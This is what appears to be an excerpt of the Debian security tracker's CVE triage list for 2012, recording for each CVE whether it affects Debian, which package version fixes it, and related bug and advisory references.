CVE-2012-2734 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cumin ...)
	NOT-FOR-US: Cumin
CVE-2012-2733 (java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP ...)
	- tomcat6 6.0.35-5+nmu1 (bug #692439)
	- tomcat7 7.0.28-1 (bug #692440)
CVE-2012-2732
	REJECTED
CVE-2012-2731 (The Ubercart AJAX Cart 6.x-2.x before 6.x-2.1 for Drupal stores the ...)
	NOT-FOR-US: Drupal module
CVE-2012-2730 (The Protected Node module 6.x-1.x before 6.x-1.6 for Drupal does not ...)
	NOT-FOR-US: Drupal module
CVE-2012-2729 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Drupal module
CVE-2012-2728 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Node ...)
	NOT-FOR-US: Drupal module
CVE-2012-2727 (Open redirect vulnerability in the Janrain Capture module 6.x-1.0 and ...)
	NOT-FOR-US: Drupal module
CVE-2012-2726 (Cross-site scripting (XSS) vulnerability in the Protest module 6.x-1.x ...)
	NOT-FOR-US: Drupal module
CVE-2012-2725 (classes/Filter/WhitelistedExternalFilter.php in the Authoring HTML ...)
	NOT-FOR-US: Drupal module
CVE-2012-2724
	RESERVED
	NOT-FOR-US: Drupal module
CVE-2012-2723 (Cross-site scripting (XSS) vulnerability in the Maestro module 7.x-1.x ...)
	NOT-FOR-US: Drupal module
CVE-2012-2722 (The node selection interface in the WYSIWYG editor (CKEditor) in the ...)
	NOT-FOR-US: Drupal module
CVE-2012-2721 (The default views in the Organic Groups (OG) module 6.x-2.x before ...)
	NOT-FOR-US: Drupal module
CVE-2012-2720 (The Token Authentication (tokenauth) module 6.x-1.x before 6.x-1.7 for ...)
	NOT-FOR-US: Drupal module
CVE-2012-2719 (The filedepot module 6.x-1.x before 6.x-1.3 for Drupal, when accessed ...)
	NOT-FOR-US: Drupal module
CVE-2012-2718 (SQL injection vulnerability in the Counter module for Drupal allows ...)
	NOT-FOR-US: Drupal module
CVE-2012-2717 (Multiple cross-site scripting (XSS) vulnerabilities in the Mobile ...)
	NOT-FOR-US: Drupal module
CVE-2012-2716 (Cross-site request forgery (CSRF) vulnerability in the Comment ...)
	NOT-FOR-US: Drupal module
CVE-2012-2715 (Cross-site scripting (XSS) vulnerability in the themes_links function ...)
	NOT-FOR-US: Drupal module
CVE-2012-2714
	RESERVED
	NOT-FOR-US: Drupal module
CVE-2012-2713 (Cross-site request forgery (CSRF) vulnerability in the BrowserID ...)
	NOT-FOR-US: Drupal module
CVE-2012-2712 (Multiple cross-site scripting (XSS) vulnerabilities in the Search API ...)
	NOT-FOR-US: Drupal module
CVE-2012-2711 (Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy ...)
	NOT-FOR-US: Drupal module
CVE-2012-2710 (Cross-site scripting (XSS) vulnerability in the Zen module 6.x-1.x ...)
	NOT-FOR-US: Drupal module
CVE-2012-2709
	REJECTED
CVE-2012-2708 (Cross-site scripting (XSS) vulnerability in the ...)
	NOT-FOR-US: Drupal module
CVE-2012-2707 (The Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal does ...)
	NOT-FOR-US: Drupal module
CVE-2012-2706 (Cross-site scripting (XSS) vulnerability in the Post Affiliate Pro ...)
	NOT-FOR-US: Drupal module
CVE-2012-2705 (The filter_titles function in the Smart Breadcrumb module 6.x-1.x ...)
	NOT-FOR-US: Drupal module
CVE-2012-2704 (The Advertisement module 6.x-2.x before 6.x-2.3 for Drupal does not ...)
	NOT-FOR-US: Drupal Module
CVE-2012-2703 (Cross-site scripting (XSS) vulnerability in the Advertisement module ...)
	NOT-FOR-US: Drupal module
CVE-2012-2702 (The Ubercart Product Keys module 6.x-1.x before 6.x-1.1 for Drupal ...)
	NOT-FOR-US: Drupal module
CVE-2012-2701
	REJECTED
CVE-2012-2700
	REJECTED
CVE-2012-2699
	REJECTED
CVE-2012-2698 (Cross-site scripting (XSS) vulnerability in the outputPage function in ...)
	[squeeze] - mediawiki (bug #677895; only affects experimental version 1.9.0)
	- mediawiki 1:1.19.1-1
CVE-2012-2697 (Unspecified vulnerability in autofs, as used in Red Hat Enterprise ...)
	- autofs 5.0.6-1
	NOTE: Fixed upstream with "fix paged ldap map read"
CVE-2012-2696 (The backend in Red Hat Enterprise Virtualization Manager (RHEV-M) ...)
	NOT-FOR-US: Red Hat Enterprise Virtualisation
CVE-2012-2695 (The Active Record component in Ruby on Rails before 3.0.14, 3.1.x ...)
	- ruby-activerecord-3.2 3.2.6-1 (bug #675429)
CVE-2012-2694 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...)
	- ruby-activerecord-3.2 3.2.6-1 (bug #675429)
CVE-2012-2693 (libvirt, possibly before 0.9.12, does not properly assign USB devices ...)
	- libvirt 0.9.12-1 (bug #677496)
	[squeeze] - libvirt (Minor issue)
CVE-2012-2692 (MantisBT before 1.2.11 does not check the delete_attachments_threshold ...)
	{DSA-2500-1}
	- mantis 1.2.11-1 (bug #676783)
CVE-2012-2691 (The mc_issue_note_update function in the SOAP API in MantisBT before ...)
	- mantis 1.2.11-1 (bug #676783)
	[squeeze] - mantis (according to maintainer)
CVE-2012-2690 (virt-edit in libguestfs before 1.18.0 does not preserve the ...)
	- libguestfs 1:1.18.0-1
	NOTE: Upstream patch https://www.redhat.com/archives/libguestfs/2012-February/msg00034.html
	NOTE: https://www.redhat.com/archives/libguestfs/2012-February/msg00033.html
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=788642
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/11/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/11/5
CVE-2012-2689
	RESERVED
CVE-2012-2688 (Unspecified vulnerability in the _php_stream_scandir function in the ...)
	{DSA-2527-1}
	- php5 5.4.4-4 (low; bug #683274)
CVE-2012-2687 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	- apache2 2.2.22-8 (low)
	[squeeze] - apache2 2.2.16-6+squeeze8
CVE-2012-2686 (crypto/evp/e_aes_cbc_hmac_sha1.c in the AES-NI functionality in the ...)
	- openssl 1.0.1e-1 (bug #699889)
	[squeeze] - openssl (Vulnerable code not present)
	NOTE: DoS in specific protocol + cpu type combination
CVE-2012-2685 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...)
	NOT-FOR-US: Cumin
CVE-2012-2684 (Multiple SQL injection vulnerabilities in the ...)
	NOT-FOR-US: Cumin
CVE-2012-2683 (Multiple cross-site scripting (XSS) vulnerabilities in Cumin before ...)
	NOT-FOR-US: Cumin
CVE-2012-2682
	RESERVED
CVE-2012-2681 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...)
	NOT-FOR-US: Cumin
CVE-2012-2680 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...)
	NOT-FOR-US: Cumin
CVE-2012-2679 (Red Hat Network (RHN) Configuration Client (rhncfg-client) in rhncfg ...)
	NOT-FOR-US: Red Hat Network configuration client
CVE-2012-2678 (389 Directory Server before 1.2.11.6 (aka Red Hat Directory Server ...)
	- 389-ds-base (Fixed before initial upload)
CVE-2012-2677 (Integer overflow in the ordered_malloc function in boost/pool/pool.hpp ...)
	- boost1.42 (low; bug #688331)
	[squeeze] - boost1.42 (Minor issue)
	- boost1.49 1.49.0-3.1 (low; bug #677197)
CVE-2012-2676 (Multiple integer overflows in the (1) malloc and (2) calloc functions ...)
	NOT-FOR-US: Hoard memory allocator
CVE-2012-2675 (Multiple integer overflows in the (1) CallMalloc (malloc) and (2) ...)
	NOT-FOR-US: nedmalloc
CVE-2012-2674 (Multiple integer overflows in the (1) chk_malloc, (2) leak_malloc, and ...)
	NOT-FOR-US: Android libc
CVE-2012-2673 (Multiple integer overflows in the (1) GC_generic_malloc and (2) calloc ...)
	- libgc 1:7.1-9 (bug #677195)
	[squeeze] - libgc 1:6.8-2
CVE-2012-2672 (Oracle Mojarra 2.1.7 does not properly "clean up" the FacesContext ...)
	- mojarra (Only affected in combination with EAP6/AS7 application servers, bug #677194)
CVE-2012-2671 (The Rack::Cache rubygem 0.3.0 through 1.1 caches Set-Cookie and other ...)
	NOTE: https://github.com/rtomayko/rack-cache/blob/master/CHANGES
	- ruby-rack-cache 1.2-1
CVE-2012-2670 (manageuser.php in Collabtive before 0.7.6 allows remote authenticated ...)
	- collabtive 0.7.6-1 (bug #676311)
	NOTE: http://www.securityfocus.com/archive/1/522973/30/0/threaded
	NOTE: http://xync.org/2012/06/04/Arbitrary-File-Upload-in-Collabtive.html
	NOTE: http://www.collabtive.o-dyn.de/blog/?p=426
CVE-2012-2669 (The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as ...)
	- linux 3.2.23-1
	[squeeze] - linux-2.6 (userspace daemon not yet present)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=761200
CVE-2012-2668 (libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31 and earlier, ...)
	- openldap (OpenLDAP in Debian uses GNUTLS instead of Mozilla NSS)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=825875
	NOTE: http://www.openldap.org/its/index.cgi?findid=7285
	NOTE: http://www.openldap.org/devel/gitweb.cgi?p=openldap.git;a=commit;h=2c2bb2e
CVE-2012-2667 (Session fixation vulnerability in ...)
	NOT-FOR-US: Symfony
	NOTE: https://bugs.gentoo.org/show_bug.cgi?id=418427
	NOTE: http://symfony.com/blog/security-release-symfony-1-4-18-released
	NOTE: http://trac.symfony-project.org/browser/tags/RELEASE_1_4_18/CHANGELOG
	NOTE: http://trac.symfony-project.org/changeset/33466?format=diff&new=33466
CVE-2012-2666
	RESERVED
CVE-2012-2665 (Multiple heap-based buffer overflows in the XML manifest encryption ...)
	{DSA-2520-1}
	- libreoffice 1:3.5.4-7
	- openoffice.org 1:3.3.0-1
	NOTE: Since 3.3.0 openoffice.org is a transitional source package
CVE-2012-2664 (The sosreport utility in the Red Hat sos package before 2.2-29 does ...)
	NOT-FOR-US: sosreport (Red Hat tool)
CVE-2012-2663
	RESERVED
	- iptables (unimportant; bug #675445)
CVE-2012-2662 (Multiple cross-site scripting (XSS) vulnerabilities in Red Hat ...)
	NOT-FOR-US: Red Hat Certificate System
CVE-2012-2661 (The Active Record component in Ruby on Rails 3.0.x before 3.0.13, ...)
	- rails (Doesn't affect RoR in Squeeze)
	- ruby-activerecord-3.2 3.2.6-1 (bug #675396; bug #675429)
	NOTE: http://seclists.org/oss-sec/2012/q2/448
CVE-2012-2660 (actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before ...)
	- ruby-activerecord-3.2 3.2.6-1 (bug #675429)
	NOTE: http://seclists.org/oss-sec/2012/q2/449
CVE-2012-2659
	RESERVED
CVE-2012-2658 (** DISPUTED ** ...)
	- unixodbc (unimportant; bug #675058)
	NOTE: Only triggerable by trusted input, not a security issue
CVE-2012-2657 (** DISPUTED ** ...)
	- unixodbc (unimportant; bug #675058)
	NOTE: Only triggerable by trusted input, not a security issue
CVE-2012-2656 [XXE vulnerability in Restlet]
	RESERVED
	- restlet (bug #596472)
CVE-2012-2655 (PostgreSQL 8.3.x before 8.3.19, 8.4.x before 8.4.12, 9.0.x before ...)
	{DSA-2491-1}
	- postgresql-9.1 9.1.4-1
	- postgresql-8.4 8.4.12-1
CVE-2012-2654 (The (1) EC2 and (2) OS APIs in OpenStack Compute (Nova) Folsom ...)
	- nova 2012.1-6 (bug #676465)
CVE-2012-2653 (arpwatch 2.1a15, as used by Red Hat, Debian, Fedora, and possibly ...)
	{DSA-2481-1}
	- arpwatch 2.1a15-1.2 (bug #674715)
	NOTE: Debian build includes the vulnerable patch (in .diff.gz)
CVE-2012-2652 (The bdrv_open function in Qemu 1.0 does not properly handle the ...)
	{DSA-2545-1 DSA-2542-1}
	- qemu 1.1.0+dfsg-1 (bug #678280)
	- qemu-kvm 1.1.0+dfsg-1
CVE-2012-2651
	RESERVED
CVE-2012-2650
	RESERVED
CVE-2012-2649 (The Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile ...)
	NOT-FOR-US: Sleipnir Mobile
CVE-2012-2648 (Cross-site scripting (XSS) vulnerability in the GoodReader app 3.16 ...)
	NOT-FOR-US: GoodReader
CVE-2012-2647 (Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote ...)
	NOT-FOR-US: Yahoo! Toolbar
CVE-2012-2646 (The Sleipnir Mobile application before 2.1.0 and Sleipnir Mobile Black ...)
	NOT-FOR-US: Sleipnir Mobile
CVE-2012-2645 (The Yahoo! Japan Yahoo! Browser application 1.2.0 and earlier for ...)
	NOT-FOR-US: The Yahoo! Japan Yahoo! Browser application
CVE-2012-2644 (Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 ...)
	NOT-FOR-US: Movable Type MT4i plugin
CVE-2012-2643 (Cross-site scripting (XSS) vulnerability in KENT-WEB YY-BOARD before ...)
	NOT-FOR-US: KENT-WEB YY-BOARD
CVE-2012-2642 (Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 ...)
	NOT-FOR-US: Movable Type MT4i plugin
CVE-2012-2641 (Cross-site scripting (XSS) vulnerability in Zenphoto before 1.4.3 ...)
	NOT-FOR-US: Zenphoto
CVE-2012-2640 (The NEC BIGLOBE Yome Collection application 1.8.3 and earlier for ...)
	NOT-FOR-US: The NEC BIGLOBE Yome Collection
CVE-2012-2639
	REJECTED
CVE-2012-2638 (Cross-site scripting (XSS) vulnerability in SmallPICT.cgi in SmallPICT ...)
	NOT-FOR-US: SmallPICT
CVE-2012-2637 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 ...)
	NOT-FOR-US: KENT-WEB WEB PATIO
CVE-2012-2636 (Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 ...)
	NOT-FOR-US: KENT-WEB WEB PATIO
CVE-2012-2635 (The Dolphin Browser HD application before 7.6 and Dolphin for Pad ...)
	NOT-FOR-US: Dolphin
CVE-2012-2634 (Cross-site scripting (XSS) vulnerability in FeedDemon before 4.0, when ...)
	NOT-FOR-US: FeedDemon
CVE-2012-2633 (Cross-site scripting (XSS) vulnerability in wassup.php in the WassUp ...)
	NOT-FOR-US: WassUp
CVE-2012-2632 (SEIL routers with firmware SEIL/x86 1.00 through 2.35, SEIL/X1 2.30 ...)
	NOT-FOR-US: SEIL routers
CVE-2012-2631 (Cross-site scripting (XSS) vulnerability in WEBLOGIC @WEB ShoppingCart ...)
	NOT-FOR-US: WEBLOGIC
CVE-2012-2630 (The Puella Magi Madoka Magica iP application 1.05 and earlier for ...)
	NOT-FOR-US: Puella Magi Madoka Magica iP (Android application)
CVE-2012-2629
	RESERVED
CVE-2012-2628
	RESERVED
CVE-2012-2627 (d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell ...)
	NOT-FOR-US: Plixer Scrutinizer
CVE-2012-2626 (cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell ...)
	NOT-FOR-US: Plixer Scrutinizer
CVE-2012-2625 (The PyGrub boot loader in Xen unstable before changeset ...)
	{DSA-2636-1}
	- xen 4.1.3-4 (low; bug #688125)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-2625
CVE-2012-2624
	RESERVED
CVE-2012-XXXX [two XSS]
	- spip 2.1.14-1 (low; bug #672961)
	[squeeze] - spip 2.1.1-3squeeze4
CVE-2012-1675 (The TNS Listener, as used in Oracle Database 11g 11.1.0.7, 11.2.0.2, ...)
	NOT-FOR-US: Oracle Database
CVE-2012-2623
	RESERVED
CVE-2012-2622
	RESERVED
CVE-2012-2621
	RESERVED
CVE-2012-2620
	RESERVED
CVE-2012-2619 (The Broadcom BCM4325 and BCM4329 Wi-Fi chips, as used in certain Acer, ...)
	- firmware-nonfree (Affects different chipset combination, see bug #694716)
CVE-2012-2618
	RESERVED
CVE-2012-2617
	RESERVED
CVE-2012-2616
	RESERVED
CVE-2012-2615
	REJECTED
CVE-2012-2614 (Buffer overflow in programmer.exe in Lattice Diamond Programmer 1.4.2 ...)
	NOT-FOR-US: Lattice Diamond Programmer
CVE-2012-2613
	RESERVED
CVE-2012-2612 (The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2611 (The DiagTraceR3Info function in the Dialog processor in disp+work.exe ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2610
	RESERVED
CVE-2012-2609
	RESERVED
CVE-2012-2608
	RESERVED
CVE-2012-2607 (The Johnson Controls CK721-A controller with firmware before ...)
	NOT-FOR-US: The Johnson Controls CK721-A
CVE-2012-2606 (The agent in Bradford Network Sentry before 5.3.3 does not require ...)
	NOT-FOR-US: Bradford Network Sentry
CVE-2012-2605 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Bradford Network Sentry
CVE-2012-2604 (Multiple cross-site scripting (XSS) vulnerabilities in GuestAccess.jsp ...)
	NOT-FOR-US: Bradford Network Sentry
CVE-2012-2603 (The server in CollabNet ScrumWorks Pro before 6.0 allows remote ...)
	NOT-FOR-US: CollabNet ScrumWorks Pro
CVE-2012-2602 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...)
	NOT-FOR-US: SolarWinds Orion Network Performance Monitor
CVE-2012-2601 (SQL injection vulnerability in WrVMwareHostList.asp in Ipswitch ...)
	NOT-FOR-US: Ipswitch WhatsUp Gold
CVE-2012-2600
	RESERVED
CVE-2012-2599
	RESERVED
CVE-2012-2598 (Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 ...)
	NOT-FOR-US: Siemens WinCC
CVE-2012-2597 (Multiple directory traversal vulnerabilities in Siemens WinCC 7.0 SP3 ...)
	NOT-FOR-US: Siemens WinCC
CVE-2012-2596 (The XPath functionality in unspecified web applications in Siemens ...)
	NOT-FOR-US: Siemens WinCC
CVE-2012-2595 (Multiple cross-site scripting (XSS) vulnerabilities in unspecified web ...)
	NOT-FOR-US: Siemens WinCC
CVE-2012-2594
	RESERVED
CVE-2012-2593
	RESERVED
CVE-2012-2592
	RESERVED
CVE-2012-2591
	RESERVED
CVE-2012-2590 (Multiple cross-site scripting (XSS) vulnerabilities in ESCON ...)
	NOT-FOR-US: ESCON SupportPortal Professional Edition
CVE-2012-2589
	REJECTED
CVE-2012-2588
	RESERVED
CVE-2012-2587 (Multiple cross-site scripting (XSS) vulnerabilities in AfterLogic ...)
	NOT-FOR-US: AfterLogic MailSuite Pro
CVE-2012-2586 (Multiple cross-site scripting (XSS) vulnerabilities in Mailtraq ...)
	NOT-FOR-US: Mailtraq
CVE-2012-2585 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...)
	NOT-FOR-US: ManageEngine ServiceDesk Plus
CVE-2012-2584 (Multiple cross-site scripting (XSS) vulnerabilities in Alt-N MDaemon ...)
	NOT-FOR-US: Alt-N MDaemon Free
CVE-2012-2583
	RESERVED
CVE-2012-2582 (Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket ...)
	{DSA-2536-1}
	- otrs2 3.1.7+dfsg1-4
CVE-2012-2581
	RESERVED
CVE-2012-2580
	RESERVED
CVE-2012-2579
	RESERVED
CVE-2012-2578 (Multiple cross-site scripting (XSS) vulnerabilities in SmarterMail 9.2 ...)
	NOT-FOR-US: SmarterMail
CVE-2012-2577 (Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds ...)
	NOT-FOR-US: SolarWinds Orion Network Performance Monitor
CVE-2012-2576
	RESERVED
CVE-2012-2575 (Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 6.0a4 ...)
	NOT-FOR-US: NetWin SurgeMail
CVE-2012-2574 (SQL injection vulnerability in the management console in Symantec Web ...)
	NOT-FOR-US: Symantec Web Gateway
CVE-2012-2573 (Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail ...)
	NOT-FOR-US: Symantec Web Gateway
CVE-2012-2572
	RESERVED
CVE-2012-2571 (Multiple cross-site scripting (XSS) vulnerabilities in WinWebMail ...)
	NOT-FOR-US: WinWebMail
CVE-2012-2570 (Cross-site scripting (XSS) vulnerability in products_map.php in X-Cart ...)
	NOT-FOR-US: X-Cart Gold
CVE-2012-2569
	RESERVED
CVE-2012-2568 (d41d8cd98f00b204e9800998ecf8427e.php in the management web server on ...)
	NOT-FOR-US: Seagate BlackArmor
CVE-2012-2567 (The Xelex MobileTrack application 2.3.7 and earlier for Android uses ...)
	NOT-FOR-US: Xelex MobileTrack application
CVE-2012-2566 (Bloxx Web Filtering before 5.0.14 does not properly interpret ...)
	NOT-FOR-US: Bloxx Web Filtering
CVE-2012-2565 (Bloxx Web Filtering before 5.0.14 does not use a salt during ...)
	NOT-FOR-US: Bloxx Web Filtering
CVE-2012-2564 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Bloxx Web Filtering
CVE-2012-2563 (Multiple cross-site scripting (XSS) vulnerabilities in Bloxx Web ...)
	NOT-FOR-US: Bloxx Web Filtering
CVE-2012-2562 (The Xelex MobileTrack application 2.3.7 and earlier for Android does ...)
	NOT-FOR-US: Xelex MobileTrack application
CVE-2012-2561 (HP Business Service Management (BSM) 9.12 does not properly restrict ...)
	NOT-FOR-US: HP Business Service Management
CVE-2012-2560 (Directory traversal vulnerability in WellinTech KingView 6.53 allows ...)
	NOT-FOR-US: WellinTech KingView
CVE-2012-2559 (WellinTech KingHistorian 3.0 allows remote attackers to execute ...)
	NOT-FOR-US: WellinTech KingHistorian
CVE-2012-2558
	RESERVED
CVE-2012-2557 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Internet Explorer
CVE-2012-2556 (The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2555
	RESERVED
CVE-2012-2554
	RESERVED
CVE-2012-2553 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2552 (Cross-site scripting (XSS) vulnerability in the SQL Server Report ...)
	NOT-FOR-US: Microsoft SQL Server
CVE-2012-2551 (The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, ...)
	NOT-FOR-US: Microsoft Windows Server
CVE-2012-2550 (Microsoft Works 9 allows remote attackers to execute arbitrary code or ...)
	NOT-FOR-US: Microsoft Works
CVE-2012-2549 (The IP-HTTPS server in Windows Server 2008 R2 and R2 SP1 and Server ...)
	NOT-FOR-US: Windows Server
CVE-2012-2548 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
	NOT-FOR-US: Internet Explorer
CVE-2012-2547
	RESERVED
CVE-2012-2546 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
	NOT-FOR-US: Internet Explorer
CVE-2012-2545
	RESERVED
CVE-2012-2544
	RESERVED
CVE-2012-2543 (Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and ...)
	NOT-FOR-US: Microsoft Excel
CVE-2012-2542
	RESERVED
CVE-2012-2541
	RESERVED
CVE-2012-2540
	RESERVED
CVE-2012-2539 (Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1; Word Viewer; ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-2538
	RESERVED
CVE-2012-2537
	RESERVED
CVE-2012-2536 (Cross-site scripting (XSS) vulnerability in Microsoft Systems ...)
	NOT-FOR-US: Microsoft Systems Management Server
CVE-2012-2535
	RESERVED
CVE-2012-2534
	RESERVED
CVE-2012-2533
	RESERVED
CVE-2012-2532 (Microsoft FTP Service 7.0 and 7.5 for Internet Information Services ...)
	NOT-FOR-US: Microsoft FTP Service
CVE-2012-2531 (Microsoft Internet Information Services (IIS) 7.5 uses weak ...)
	NOT-FOR-US: Microsoft IIS
CVE-2012-2530 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2529 (Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2528 (Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and ...)
	NOT-FOR-US: Microsoft Word
CVE-2012-2527 (Use-after-free vulnerability in win32k.sys in the kernel-mode drivers ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2526 (The Remote Desktop Protocol (RDP) implementation in Microsoft Windows ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-2525
	RESERVED
CVE-2012-2524 (Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-2523 (Integer overflow in Microsoft Internet Explorer 8 and 9, JScript 5.8, ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-2522 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-2521 (Microsoft Internet Explorer 6 through 9 does not properly handle ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2012-2520 (Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 ...)
	NOT-FOR-US: Microsoft Infopath
CVE-2012-2519 (Untrusted search path vulnerability in Entity Framework in ADO.NET in ...)
	NOT-FOR-US: Microsoft .NET framework
CVE-2012-2518
	RESERVED
CVE-2012-2517
	RESERVED
CVE-2012-2516 (An ActiveX control in KeyHelp.ocx in KeyWorks KeyHelp Module (aka the ...)
	NOT-FOR-US: KeyWorks not in Debian
CVE-2012-2515 (Multiple stack-based buffer overflows in the KeyHelp.KeyCtrl.1 ActiveX ...)
	NOT-FOR-US: KeyWorks not in Debian
CVE-2012-2514 (The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2513 (The Diaginput function in disp+work.exe 7010.29.15.58313 and ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2512 (The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2511 (The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2012-2510
	RESERVED
CVE-2012-2509
	RESERVED
CVE-2012-2508
	RESERVED
CVE-2012-2507
	RESERVED
CVE-2012-2506
	RESERVED
CVE-2012-2505
	RESERVED
CVE-2012-2504
	RESERVED
CVE-2012-2503
	RESERVED
CVE-2012-2502
	RESERVED
CVE-2012-2501
	RESERVED
CVE-2012-2500 (Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 does not ...)
	NOT-FOR-US: Cisco
CVE-2012-2499 (The IPsec implementation in Cisco AnyConnect Secure Mobility Client ...)
	NOT-FOR-US: Cisco
CVE-2012-2498 (Cisco AnyConnect Secure Mobility Client 3.0 through 3.0.08066 does not ...)
	NOT-FOR-US: Cisco
CVE-2012-2497
	RESERVED
CVE-2012-2496 (A certain Java applet in the VPN downloader implementation in the ...)
	NOT-FOR-US: Cisco
CVE-2012-2495 (The HostScan downloader implementation in Cisco AnyConnect Secure ...)
	NOT-FOR-US: Cisco
CVE-2012-2494 (The VPN downloader implementation in the WebLaunch feature in Cisco ...)
	NOT-FOR-US: Cisco
CVE-2012-2493 (The VPN downloader implementation in the WebLaunch feature in Cisco ...)
	NOT-FOR-US: Cisco
CVE-2012-2492
	RESERVED
CVE-2012-2491
	RESERVED
CVE-2012-2490 (Cisco IP Communicator 8.6 allows man-in-the-middle attackers to modify ...)
	NOT-FOR-US: Cisco
CVE-2012-2489
	RESERVED
CVE-2012-2488 (Cisco IOS XR before 4.2.1 on ASR 9000 series devices and CRS series ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-2487
	RESERVED
CVE-2012-2486 (The Cisco Discovery Protocol (CDP) implementation on Cisco ...)
	NOT-FOR-US: Cisco Telepresence
CVE-2012-2485
	RESERVED
CVE-2012-2484
	RESERVED
CVE-2012-2483
	RESERVED
CVE-2012-2482
	RESERVED
CVE-2012-2481
	RESERVED
CVE-2012-2480
	RESERVED
CVE-2012-2479
	RESERVED
CVE-2012-2478
	RESERVED
CVE-2012-2477
	RESERVED
CVE-2012-2476
	RESERVED
CVE-2012-2475
	RESERVED
CVE-2012-2474 (Memory leak on Cisco Adaptive Security Appliances (ASA) 5500 series ...)
	NOT-FOR-US: Cisco
CVE-2012-2473
	RESERVED
CVE-2012-2472 (Cisco Adaptive Security Appliances (ASA) 5500 series devices with ...)
	NOT-FOR-US: Cisco
CVE-2012-2471
	RESERVED
CVE-2012-2470
	RESERVED
CVE-2012-2469 (Cisco NX-OS 4.2, 5.0, 5.1, and 5.2 on Nexus 7000 series switches, when ...)
	NOT-FOR-US: Cisco
CVE-2012-2468
	RESERVED
CVE-2012-2467
	RESERVED
CVE-2012-2466
	RESERVED
CVE-2012-2465
	RESERVED
CVE-2012-2464
	RESERVED
CVE-2012-2463
	RESERVED
CVE-2012-2462
	RESERVED
CVE-2012-2461
	RESERVED
CVE-2012-2460
	RESERVED
CVE-2012-2459 (Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.6, ...)
	- bitcoin 0.6.2.1-1
	NOTE: https://bitcointalk.org/index.php?topic=81749.0
CVE-2012-2458
	RESERVED
CVE-2012-2457
	RESERVED
CVE-2012-2456
	RESERVED
CVE-2012-2455 (Advanced Productivity Software DTE Axiom before 12.3.3 does not ...)
	NOT-FOR-US: Advanced Productivity Software DTE Axiom
CVE-2012-2454
	RESERVED
CVE-2012-2453
	RESERVED
CVE-2012-2452
	RESERVED
CVE-2012-2450 (VMware Workstation 8.x before 8.0.3, VMware Player 4.x before 4.0.3, ...)
